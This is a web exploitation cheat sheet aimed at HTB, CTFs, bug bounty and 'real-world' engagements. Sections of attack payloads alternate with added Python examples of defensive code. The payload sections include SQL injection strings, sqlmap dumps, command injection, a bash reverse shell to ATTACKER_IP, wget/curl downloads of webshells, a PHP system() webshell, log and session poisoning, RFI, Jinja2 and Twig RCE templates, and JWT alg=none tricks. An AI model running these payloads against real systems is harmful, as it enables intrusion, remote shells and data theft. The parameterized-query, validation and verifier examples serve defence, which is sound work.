Web Exploitation Cheatsheet

A practical cheat sheet for web exploitation during HTB, CTFs, bug bounty and offensive security engagements.


0. ESSENTIAL WEB EXPLOITATION TOOLS

Core Tools

Quick Webshell Upload Commands


python3 -m http.server 8000
wget http://ATTACKER_IP:8000/shell.php
curl -O http://ATTACKER_IP:8000/shell.aspx

1. SQL INJECTION (SQLi)

Detecting SQLi manually


'
"
')
"))
or 1=1--
or '1'='1'

Boolean-based SQLi


?id=1' AND 1=1--
?id=1' AND 1=2--

UNION-based SQLi

Find column count:


ORDER BY 1--
ORDER BY 2--
ORDER BY 3--

Union:


UNION SELECT 1,2,3--

Extract data:


UNION SELECT username, password, 3 FROM users--

Error-based SQLi (MySQL)


?id=1' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT user()),0x3a,FLOOR(RAND()*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)--

Time-based SQLi


?id=1' AND SLEEP(5)--

sqlmap basic usage


sqlmap -u "http://TARGET/page?id=1" --batch

Dump DB:


sqlmap -u "http://TARGET/page?id=1" --dump-all

Bypass WAF:


--random-agent --tamper=space2comment
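The probes above work because the parameter value is concatenated into the SQL text. The following is an added example (not part of the original cheat sheet) written in Python against an in-memory SQLite table, with constructed sample rows: it puts the vulnerable string-formatting pattern next to the parameterized form, so the same boolean and tautology probes can be run against both, and adds a small indicator function of the kind a WAF rule or log-review script would apply to decoded parameter values.

```python
import re
import sqlite3


def make_db():
    """Constructed sample database (not from the original page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "s3cret"), (2, "bob", "hunter2"), (3, "carol", "pw")],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    """String formatting: the parameter value becomes part of the SQL text."""
    sql = "SELECT username FROM users WHERE id = '%s'" % user_id
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, user_id):
    """Parameterized query: the value is bound by the driver and never parsed as SQL."""
    rows = conn.execute("SELECT username FROM users WHERE id = ?", (user_id,))
    return [row[0] for row in rows]


# Detection side: indicator classes for the probes listed above, applied to a
# URL-decoded parameter value. Tune per application; '--' and '#' are noisy.
SQLI_PATTERNS = {
    "tautology": re.compile(r"\b(or|and)\s+['\"]?\w+['\"]?\s*=\s*['\"]?\w+", re.I),
    "union": re.compile(r"\bunion\b.+\bselect\b", re.I),
    "time": re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I),
    "comment": re.compile(r"--|/\*|#"),
}


def sqli_indicators(value):
    """Return the sorted names of the indicator classes found in a parameter value."""
    return sorted(name for name, rx in SQLI_PATTERNS.items() if rx.search(value))


if __name__ == "__main__":
    db = make_db()
    for probe in ["1", "1' AND 1=1--", "1' AND 1=2--", "1' OR '1'='1"]:
        print(f"{probe!r:18} vulnerable={lookup_vulnerable(db, probe)} "
              f"safe={lookup_safe(db, probe)} flags={sqli_indicators(probe)}")
```

The boolean pair behaves differently only in the vulnerable function (AND 1=1 returns the row, AND 1=2 returns nothing), which is exactly the signal the manual test looks for; the parameterized form returns nothing for every probe because the whole string is compared as a value.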

2. COMMAND INJECTION (RCE)

Basic payloads


; ls
&& whoami
| id

Blind command injection


; sleep 5
&& ping -c 5 127.0.0.1

Windows RCE


& whoami
| powershell -c whoami

Web reverse shell


bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
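Every payload in this section relies on the application handing a string to a shell. The example below is added here and is not from the original page; it is Python (chosen as the demonstration language for the whole page) and assumes a ping-style feature taking a host from the user. It shows how a shell tokenises the injected string, and the hardened form: a strict value allowlist plus an argv list with no shell, so a trailing "; sleep 5" can only ever be a literal argument that ping rejects.

```python
import re
import shlex
import subprocess

# Hostname / IPv4 allowlist: letters, digits, dots and hyphens, no leading hyphen
# (so the value can never be parsed as an option), no shell metacharacters at all.
HOST_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.\-]{0,252})$")


def vulnerable_command(host):
    """The vulnerable pattern: one string later handed to /bin/sh (os.system, shell=True)."""
    return "ping -c 1 " + host


def shell_tokens(cmdline):
    """Tokenise a command line the way a POSIX shell does, so the injected operator is visible."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    return list(lexer)


def ping_argv(host):
    """Hardened form: validate the value, then build an argv list; no shell is involved."""
    if not HOST_RE.fullmatch(host):
        raise ValueError("rejected host value: %r" % host)
    return ["ping", "-c", "1", host]


def run_ping(host, timeout=10):
    """Execute with shell=False; metacharacters in host never reach a shell."""
    return subprocess.run(ping_argv(host), capture_output=True, text=True, timeout=timeout)


if __name__ == "__main__":
    injected = vulnerable_command("127.0.0.1; sleep 5")
    print(shell_tokens(injected))   # ';' becomes a separate token: a second command
    try:
        ping_argv("127.0.0.1; sleep 5")
    except ValueError as exc:
        print("blocked:", exc)
```

The tokeniser output makes the blind variant obvious: the shell sees two commands, and the only thing the attacker observes is the five-second delay. Validation is the first control and shell=False the second; keep both, since validation regexes are the part most often weakened later.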

3. FILE UPLOAD ATTACKS

Bypass client-side restrictions

Common bypass extensions (PHP)


shell.php
shell.php.jpg
shell.phtml
shell.phar

Apache %00 null byte bypass


shell.php%00.jpg

IIS / ASP.NET


shell.aspx
shell.asp;.jpg

Simple PHP webshell

<?php system($_GET['cmd']); ?>

Access:

/uploads/shell.php?cmd=id
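Each bypass name above defeats a validator that looks only at the last extension or only at the client-side check. The following is an added example (not from the original page), in Python, of a server-side validator for an image upload feature: one plain name with a single allowlisted extension, a null-byte check on both the raw and the percent-encoded form, a magic-byte check on the content, and a server-generated storage name so the user-supplied name never reaches the filesystem. The magic-byte table and field lengths are constructed for the example.

```python
import os
import re
import secrets

# Constructed allowlist: canonical extension -> bytes the content must start with.
IMAGE_MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}
# One plain name, one extension, nothing else: no second '.', no ';', no '/', no '%'.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_\-]{1,64}\.([A-Za-z0-9]{1,5})$")


def validate_upload(filename, data):
    """Return the canonical extension if the upload is acceptable, else raise ValueError."""
    if "\x00" in filename or "%00" in filename.lower():
        raise ValueError("null byte in filename")
    # Discard any directory component (either separator) before looking at the name.
    base = os.path.basename(filename.replace("\\", "/"))
    match = SAFE_NAME.fullmatch(base)
    if not match:
        # Rejects shell.php.jpg, shell.asp;.jpg, shell.phtml, shell.phar, ...
        raise ValueError("filename not allowed: %r" % filename)
    ext = match.group(1).lower()
    if ext == "jpeg":
        ext = "jpg"
    if ext not in IMAGE_MAGIC:
        raise ValueError("extension not allowed: %r" % ext)
    if not data.startswith(IMAGE_MAGIC[ext]):
        raise ValueError("content does not match extension")
    if b"<?" in data:
        # Defence in depth: a PHP tag inside otherwise valid image data would still run
        # if the server ever treated the file as a script.
        raise ValueError("script tag embedded in image data")
    return ext


def storage_name(ext):
    """Never store under the user-supplied name; generate one server-side."""
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16
    print(validate_upload("photo.jpg", jpeg), storage_name("jpg"))
    for name in ["shell.php", "shell.php.jpg", "shell.phtml", "shell.php%00.jpg", "shell.asp;.jpg"]:
        try:
            validate_upload(name, b"not an image")
        except ValueError as exc:
            print("rejected:", exc)
```

Pair the validator with a storage location outside the web root, or a directory where the web server has script execution disabled, so that a validator bug does not by itself become remote code execution.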

4. LFI / RFI (Local & Remote File Inclusion)

4.1 Basic LFI

?page=../../../../etc/passwd
?page=../../../../windows/win.ini

4.2 PHP wrappers

Read a file Base64-encoded

?page=php://filter/convert.base64-encode/resource=./index.php

Compress with zlib.deflate, then Base64-encode (decode with base64 followed by zlib inflate)

?page=php://filter/zlib.deflate/convert.base64-encode/resource=index.php

Chain multiple wrappers

?page=php://filter/string.strip_tags|convert.base64-encode/resource=index.php

4.3 PHP Filter Chain RCE (Synacktiv)

If the application does:

include($_GET['page'])

Use:

Example generated payload:

php://filter/resource=index.php|convert.iconv.UTF8.UTF7|...

Or RCE via filter chains:

?page=php://filter/convert.base64-encode|convert.iconv.UTF8.UTF7/resource=php://input

Send PHP code in request body:

<?=`id`?>

4.4 Log Poisoning → LFI → RCE

Inject webshell into access log:

curl -A "<?php system($_GET['cmd']); ?>" http://TARGET/

Execute:

?page=/var/log/apache2/access.log&cmd=id

4.5 RFI (if allow_url_fopen = On)

?page=http://ATTACKER_IP/shell.txt

5. DIRECTORY TRAVERSAL & FILE DISCLOSURE

Basic traversal

../../../../etc/passwd
..\..\..\windows\win.ini

Null byte bypass

file=../../../../etc/passwd%00

Nginx path confusion

/static../config.php
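Sections 4 and 5 (and the wrapper list in section 11) all exploit an include or file-read that takes a path or stream name from the request. The example below is added here and is not part of the original page; it is Python and assumes a "page" parameter that selects a file under an include directory. It shows the preferred design (the parameter is a key into a server-side map) and, where a real path must be accepted, a resolver that decodes the value, refuses any scheme prefix such as php://, data:// or expect://, refuses null bytes, canonicalises the path and confirms it is still under the base directory. The demo directory and file names are constructed.

```python
import os
import re
import tempfile
from urllib.parse import unquote

# Any scheme prefix (php://, data://, expect://, http://, file:, ...) is refused outright.
SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]*:")

# Preferred design: the request parameter is a key into a server-side map, never a path.
PAGE_MAP = {"home": "home.php", "about": "about.php"}


def include_by_key(base_dir, key):
    if key not in PAGE_MAP:
        raise ValueError("unknown page key: %r" % key)
    return os.path.join(os.path.realpath(base_dir), PAGE_MAP[key])


def resolve_under(base_dir, user_path):
    """Fallback when a real path must be accepted: decode, refuse wrappers and NULs,
    then canonicalise and confirm the result is still inside base_dir."""
    base = os.path.realpath(base_dir)
    decoded = unquote(user_path)          # %2e%2e%2f and %00 become what the OS would see
    if "\x00" in decoded:
        raise ValueError("null byte in path")
    if SCHEME_RE.match(decoded):
        raise ValueError("stream wrapper or URL refused: %r" % user_path)
    candidate = os.path.realpath(os.path.join(base, decoded.replace("\\", "/")))
    # realpath follows symlinks too, so a link inside base_dir pointing outside is caught.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes base directory: %r" % user_path)
    return candidate


def demo_base():
    """Constructed include directory for trying the functions offline."""
    directory = tempfile.mkdtemp(prefix="inc_")
    for name in PAGE_MAP.values():
        with open(os.path.join(directory, name), "w") as fh:
            fh.write("<?php echo 'ok'; ?>\n")
    return directory


if __name__ == "__main__":
    base = demo_base()
    print(include_by_key(base, "home"))
    for probe in ["../../../../etc/passwd", "..%2F..%2Fetc%2Fpasswd",
                  "php://filter/convert.base64-encode/resource=index.php",
                  "expect://id", "/var/log/apache2/access.log"]:
        try:
            resolve_under(base, probe)
        except ValueError as exc:
            print("refused:", exc)
```

Note that an absolute path like /etc/passwd or a log file path is refused by the base-directory check, not by a traversal-specific pattern, so encoded or doubled ../ sequences do not need to be enumerated. Disabling allow_url_include and not passing request data to include() at all remain the primary controls.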

6. DESERIALIZATION ATTACKS

PHP

O:7:"Exploit":0:{}

Java (Commons Collections)

java -jar ysoserial.jar CommonsCollections1 "cmd" | base64

Python Pickle

import os
os.system("id")
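The pickle entry above works because the stream can name any importable callable and pickle will call it on load. The following added example (not from the original page) is Python and follows the restricted-unpickler pattern from the standard library documentation: a constructed class whose __reduce__ asks for os.getcwd (inert, but loaded through exactly the mechanism os.system would be), the default loader that calls it, and an allowlisting Unpickler that refuses every global not on a short list.

```python
import io
import os
import pickle
from collections import OrderedDict


class Gadget:
    """Constructed demonstration class: __reduce__ tells pickle to call os.getcwd()
    at load time. Any other callable could be named here in the same way."""
    def __reduce__(self):
        return (os.getcwd, ())


# Allowlist of (module, name) pairs the application genuinely needs to unpickle.
SAFE_GLOBALS = {
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Every global reference in the stream passes through find_class; refuse all
    but the allowlist, before anything is instantiated or called."""
    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError("forbidden global %s.%s" % (module, name))


def unsafe_loads(data):
    """What most code does: pickle.loads executes whatever the stream names."""
    return pickle.loads(data)


def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def demo_payload():
    """Constructed stream that references a callable outside the allowlist."""
    return pickle.dumps(Gadget())


def benign_payload():
    """Constructed stream that only uses allowlisted globals and plain containers."""
    return pickle.dumps(OrderedDict(a=1, b=[2, 3]))


if __name__ == "__main__":
    print("default loader ran the callable:", unsafe_loads(demo_payload()))
    print("restricted loader, benign data:", restricted_loads(benign_payload()))
    try:
        restricted_loads(demo_payload())
    except pickle.UnpicklingError as exc:
        print("restricted loader refused:", exc)
```

An allowlist limits the blast radius but does not make pickle a safe interchange format; for data that crosses a trust boundary, use JSON or another data-only format, or at minimum authenticate the pickle bytes with an HMAC before loading.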

7. SSTI (Server-Side Template Injection)

Detect SSTI (Jinja2)

{{7*7}}

Jinja2 RCE

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

Twig RCE

{{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('id')}}

8. AUTHENTICATION BYPASS ATTACKS

8.1 JWT Exploitation

alg=none

Edit token:

{"alg":"none"}

Weak HS256 secret

hashcat -a 0 -m 16500 jwt.txt rockyou.txt

KID file inclusion

"kid": "../../../../../../../etc/passwd"

8.2 OAuth2 Misconfigurations

Open redirect

redirect_uri=http://attacker/callback

Token substitution

Replay access_token between clients.

Referer-leakage tricks

Force redirect → steal token.
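The JWT entries in 8.1 and the redirect_uri entry in 8.2 are both verifier-side mistakes: honouring the token's own alg, treating kid as a file path, a guessable HS256 secret, and matching redirect URIs loosely. The example below is added here and is not part of the original page; it is Python using only the standard library, with a constructed issuer helper so the verifier can be exercised offline. The key table and the registered redirect URI are constructed values.

```python
import base64
import hashlib
import hmac
import json
import re
import time
from urllib.parse import urlsplit


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_hs256(header, payload, secret):
    """Issuer side (constructed helper). Secrets should be >= 32 random bytes,
    e.g. secrets.token_bytes(32); short passphrases fall to offline cracking."""
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return f"{h}.{p}.{b64url_encode(sig)}"


KID_RE = re.compile(r"^[A-Za-z0-9_\-]{1,64}$")


def verify_hs256(token, keys, now=None):
    """keys maps kid -> secret bytes. Returns the payload or raises ValueError."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    h_b64, p_b64, s_b64 = parts
    header = json.loads(b64url_decode(h_b64))
    # 1. Algorithm pinning: the verifier decides; "none" and HS/RS confusion are refused.
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        raise ValueError("unexpected alg")
    # 2. kid is a dictionary key, never a path: strict character allowlist, then lookup.
    kid = header.get("kid", "default")
    if not isinstance(kid, str) or not KID_RE.fullmatch(kid) or kid not in keys:
        raise ValueError("unknown or malformed kid")
    expected = hmac.new(keys[kid], f"{h_b64}.{p_b64}".encode(), hashlib.sha256).digest()
    # 3. Constant-time signature comparison.
    if not hmac.compare_digest(expected, b64url_decode(s_b64)):
        raise ValueError("signature mismatch")
    payload = json.loads(b64url_decode(p_b64))
    # 4. Expiry.
    if "exp" in payload and payload["exp"] <= (time.time() if now is None else now):
        raise ValueError("token expired")
    return payload


# OAuth2: compare redirect_uri with the registered value exactly, never by prefix,
# hostname substring or scheme-insensitive match.
REGISTERED_REDIRECTS = {"client-a": {"https://app.example.test/callback"}}


def redirect_uri_allowed(client_id, redirect_uri):
    candidate = urlsplit(redirect_uri)
    if candidate.scheme != "https" or candidate.fragment:
        return False
    return redirect_uri in REGISTERED_REDIRECTS.get(client_id, set())


if __name__ == "__main__":
    keys = {"k1": b"constructed-test-secret-at-least-32-bytes!"}
    token = issue_hs256({"alg": "HS256", "typ": "JWT", "kid": "k1"}, {"sub": "alice"}, keys["k1"])
    print(verify_hs256(token, keys))
    print(redirect_uri_allowed("client-a", "http://attacker/callback"))
```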


9. BUSINESS LOGIC VULNERABILITIES

IDOR

/api/user?id=1001 → change id=1000

Mass assignment

{"role":"admin"}

Bypass business validation

Replay modified request in Burp.
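IDOR and mass assignment share a root cause: the request decides which object is touched and which fields change. The following added example (not from the original page) is Python with a constructed in-memory user table; it shows object-level authorization driven by the session rather than the URL id, and a field allowlist for updates that drops a submitted "role" and reports it for logging.

```python
WRITABLE_FIELDS = {"name", "email"}   # everything else (role, id, ...) is server-controlled


class Forbidden(Exception):
    pass


def make_store():
    """Constructed user table for the example."""
    return {
        1000: {"id": 1000, "name": "alice", "email": "alice@example.test", "role": "user"},
        1001: {"id": 1001, "name": "bob", "email": "bob@example.test", "role": "user"},
        1: {"id": 1, "name": "ops", "email": "ops@example.test", "role": "admin"},
    }


def authorize(store, session_user_id, requested_id):
    """Object-level authorization: the id in the URL is honoured only if the
    authenticated session may act on that object. Authorization is decided
    before existence is revealed, so the error does not leak valid ids."""
    actor = store[session_user_id]
    if requested_id != session_user_id and actor["role"] != "admin":
        raise Forbidden(f"user {session_user_id} may not access user {requested_id}")
    if requested_id not in store:
        raise KeyError(requested_id)
    return store[requested_id]


def update_user(store, session_user_id, requested_id, payload):
    """Mass-assignment defence: copy only allowlisted fields; return the rest for logging."""
    user = authorize(store, session_user_id, requested_id)
    rejected = sorted(set(payload) - WRITABLE_FIELDS)
    for field in WRITABLE_FIELDS & set(payload):
        user[field] = payload[field]
    return user, rejected


if __name__ == "__main__":
    store = make_store()
    print(update_user(store, 1000, 1000, {"name": "Alice", "role": "admin"}))
    try:
        authorize(store, 1001, 1000)
    except Forbidden as exc:
        print("blocked:", exc)
```

The rejected-field list is worth alerting on: a client that keeps submitting "role" is either a broken integration or someone probing exactly this weakness.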


10. HEADERS & CACHING ATTACKS

X-Forwarded-For spoofing

X-Forwarded-For: 127.0.0.1

Cache poisoning

/?cb=alert(1)
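The X-Forwarded-For spoof above succeeds when the application takes the leftmost header entry, which is the one the client supplied. The example below is added here and is not part of the original page; it is Python with a constructed trusted-proxy range, and puts the naive parser beside one that walks the chain from the right, skipping the operator's own proxies, so a client-supplied 127.0.0.1 never becomes the "client IP" used for an internal-access decision.

```python
import ipaddress

# Constructed: address ranges of the reverse proxies / load balancers in front of the app.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def is_trusted_proxy(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in TRUSTED_PROXIES)


def client_ip_naive(remote_addr, xff):
    """The pattern the spoof exploits: trust the leftmost X-Forwarded-For entry."""
    if xff:
        return xff.split(",")[0].strip()
    return remote_addr


def client_ip(remote_addr, xff):
    """Walk the chain right-to-left, skipping hops we operate; the first other address is
    the client. Anything further left was supplied by the client and is ignored."""
    if not is_trusted_proxy(remote_addr):
        return remote_addr                 # direct connection: the header is untrusted input
    hops = [h.strip() for h in xff.split(",") if h.strip()] if xff else []
    for hop in reversed(hops):
        try:
            if not is_trusted_proxy(hop):
                return hop
        except ValueError:
            raise ValueError("malformed X-Forwarded-For entry: %r" % hop)
    return remote_addr                     # only our own proxies appear in the chain


def is_internal_client(remote_addr, xff):
    """A decision that must never be driven by a client-controlled header value."""
    return ipaddress.ip_address(client_ip(remote_addr, xff)).is_loopback


if __name__ == "__main__":
    spoofed = "127.0.0.1, 203.0.113.9"     # client sent 127.0.0.1; proxy appended its real address
    print("naive :", client_ip_naive("10.0.0.5", spoofed))
    print("chain :", client_ip("10.0.0.5", spoofed))
    print("internal?", is_internal_client("10.0.0.5", spoofed))
```

The same rule applies to any header used as a cache key or as a trust signal (X-Real-IP, Forwarded, X-Forwarded-Host): strip or overwrite it at the first trusted proxy, and in the application accept it only from that proxy's address.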

11. ADVANCED LFI/RFI/RCE TECHNIQUES (ADDED)

11.1 PHP Wrappers Quick Reference

php://filter
php://input
php://stdin
php://memory
php://temp
data://
expect://

11.2 LFI → RCE via php://input

?page=php://input

Send in POST:

<?=`id`?>

11.3 LFI → RCE via session poisoning

If PHP uses sessions:

/var/lib/php/sessions/sess_<PHPSESSID>

Inject payload:

PHPSESSID=<?=`id`?>

Then include:

?page=/var/lib/php/sessions/sess_<ID>

11.4 Using expect:// for direct command exec (if enabled)

?page=expect://id

11.5 LFI on Nginx alias bypass

/static../index.php

11.6 RFI with stream wrappers (if remote fopen enabled)

?page=data://text/plain,<?=`id`?>

Final Notes

This cheat sheet now includes:

Useful for HTB, CTFs, bug bounty and real-world web exploitation.


